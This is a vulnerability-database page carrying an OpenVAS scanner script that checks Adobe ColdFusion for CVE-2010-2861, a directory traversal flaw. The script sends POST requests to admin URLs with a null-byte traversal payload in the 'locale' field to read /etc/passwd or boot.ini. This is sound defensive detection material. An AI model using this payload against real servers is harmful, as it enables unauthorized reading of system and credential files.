Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
openvasThis script is Copyright (C) 2010 Greenbone Networks GmbHOPENVAS:100772
HistorySep 02, 2010 - 12:00 a.m.

Adobe ColdFusion Directory Traversal Vulnerability

2010-09-0200:00:00
This script is Copyright (C) 2010 Greenbone Networks GmbH
plugins.openvas.org
615

0.972 High

EPSS

Percentile

99.8%

JSON

Adobe ColdFusion is prone to a directory-traversal vulnerability
because it fails to sufficiently sanitize user-supplied input.

Exploiting this issue may allow an attacker to obtain sensitive
information that could aid in further attacks.

Adobe ColdFusion 9.0.1 and prior are vulnerable.

###############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_coldfusion_42342.nasl 5263 2017-02-10 13:45:51Z teissa $
#
# Adobe ColdFusion CVE-2010-2861 Directory Traversal Vulnerability
#
# Authors:
# Michael Meyer <[email protected]>
#
# Copyright:
# Copyright (c) 2010 Greenbone Networks GmbH
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

tag_summary = "Adobe ColdFusion is prone to a directory-traversal vulnerability
because it fails to sufficiently sanitize user-supplied input.

Exploiting this issue may allow an attacker to obtain sensitive
information that could aid in further attacks.

Adobe ColdFusion 9.0.1 and prior are vulnerable.";

tag_solution = "Updates are available. Please see the references for more information.";

if (description)
{
 script_id(100772);
 script_version("$Revision: 5263 $");
 script_tag(name:"last_modification", value:"$Date: 2017-02-10 14:45:51 +0100 (Fri, 10 Feb 2017) $");
 script_tag(name:"creation_date", value:"2010-09-02 16:10:00 +0200 (Thu, 02 Sep 2010)");
 script_bugtraq_id(42342);
 script_cve_id("CVE-2010-2861");

 script_name("Adobe ColdFusion Directory Traversal Vulnerability");

 script_xref(name : "URL" , value : "https://www.securityfocus.com/bid/42342");
 script_xref(name : "URL" , value : "http://www.adobe.com/products/coldfusion/");
 script_xref(name : "URL" , value : "http://www.adobe.com");
 script_xref(name : "URL" , value : "http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/");
 script_xref(name : "URL" , value : "http://www.procheckup.com/");
 script_xref(name : "URL" , value : "http://www.adobe.com/support/security/bulletins/apsb10-18.html");

 script_tag(name:"cvss_base", value:"7.5");
 script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_tag(name:"qod_type", value:"remote_vul");
 script_category(ACT_ATTACK);
 script_family("Web application abuses");
 script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH");
 script_dependencies("os_detection.nasl", "gb_coldfusion_detect.nasl");
 script_require_ports("Services/www", 80);
 script_tag(name : "solution" , value : tag_solution);
 script_tag(name : "summary" , value : tag_summary);
 exit(0);
}

include("http_func.inc");
include("host_details.inc");
include("http_keepalive.inc");
include("version_func.inc");

port = get_http_port(default:80);
if(!get_port_state(port))exit(0);

if(!get_kb_item(string("coldfusion/",port,"/installed")))exit(0);

res = host_runs("windows");
if (res == "yes") {
    files = make_array("\[boot loader\]","boot.ini");
} else if (res == "no") {
    files = make_array("root:.*:0:[01]:","etc/passwd");
} else {
  # "unknown"
  files = make_array("root:.*:0:[01]:","etc/passwd","\[boot loader\]","boot.ini");
}

urls[i++] = "/CFIDE/administrator/enter.cfm";
urls[i++] = "/CFIDE/wizards/common/_logintowizard.cfm";
urls[i++] = "/CFIDE/administrator/archives/index.cfm";
urls[i++] = "/CFIDE/administrator/entman/index.cfm";

foreach url (urls) {
  foreach file (keys(files)) {
  
    postdata = string("locale=%00../../../../../../../../../../../",files[file],"%00a");
  
    req = string(
             "POST ", url, " HTTP/1.1\r\n",
             "Host: ", get_host_name(), "\r\n",
             "Content-Type: application/x-www-form-urlencoded\r\n",
             "Content-Length: ", strlen(postdata), "\r\n",
             "\r\n",
             postdata
        );

    res = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);

    if(egrep(pattern: file, string: res, icase: TRUE)) {
      security_message(port:port);
      exit(0);
    }
  }
}

exit(0);

Related

packetstorm 2
prion 2
metasploit 1
securityvulns 1
cve 2
nuclei 1
checkpoint_advisories 1
exploitpack 1
seebug 2
attackerkb 1
cisa_kev 1
nessus 1
openvas 1
canvas 1
exploitdb 1
thn 1
threatpost 1
nmap 1
packetstorm
packetstorm
Adobe ColdFusion - Directory Traversal
2011-03-16 00:00:00
Adobe ColdFusion Directory Traversal
2010-08-17 00:00:00
prion
prion
Directory traversal
2010-08-11 18:47:00
Design/Logic Flaw
2013-09-20 16:55:00
metasploit
metasploit
ColdFusion Server Check
2010-09-01 01:57:22
securityvulns
securityvulns
PR10-07: Unauthenticated File Retrieval &#40;traversal&#41; within ColdFusion administration console
2010-08-12 00:00:00
cve
cve
CVE-2010-2861
2010-08-11 18:47:00
CVE-2010-5290
2013-09-20 16:55:00
nuclei
nuclei
Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI
2021-03-01 04:26:27
checkpoint_advisories
checkpoint_advisories
Adobe ColdFusion Directory Traversal (APSB10-18; CVE-2010-2861)
2010-09-05 00:00:00
exploitpack
exploitpack
Adobe ColdFusion - Directory Traversal
2010-08-14 00:00:00
seebug
seebug
Adobe ColdFusion <=8.0 - Directory Traversal Vulnerability (CVE-2010-2861)
2014-07-01 00:00:00
Adobe ColdFusion Directory Traversal Vulnerability
2010-09-30 00:00:00
attackerkb
attackerkb
CVE-2010-2861
2010-08-11 00:00:00
cisa_kev
cisa_kev
Adobe ColdFusion Directory Traversal Vulnerability
2022-03-25 00:00:00
nessus
nessus
Adobe ColdFusion 'locale' Parameter Directory Traversal
2010-08-16 00:00:00
openvas
openvas
Adobe ColdFusion Directory Traversal Vulnerability (APSB10-18)
2010-09-02 00:00:00
canvas
canvas
Immunity Canvas: CF_DIRECTORY_TRAVERSAL
2010-08-11 18:47:00
exploitdb
exploitdb
Adobe ColdFusion - Directory Traversal
2010-08-14 00:00:00
thn
thn
Cring Ransomware Gang Exploits 11-Year-Old ColdFusion Bug
2021-09-21 12:27:00
threatpost
threatpost
12 New Flaws Used in Ransomware Attacks in Q3
2021-11-09 18:06:33
nmap
nmap
http-vuln-cve2010-2861 NSE Script
2012-02-19 14:40:01

0.972 High

EPSS

Percentile

99.8%

JSON
Related for OPENVAS:100772
packetstorm2prion2metasploit1securityvulns1cve2nuclei1checkpoint_advisories1exploitpack1seebug2attackerkb1cisa_kev1nessus1openvas1canvas1exploitdb1thn1threatpost1nmap1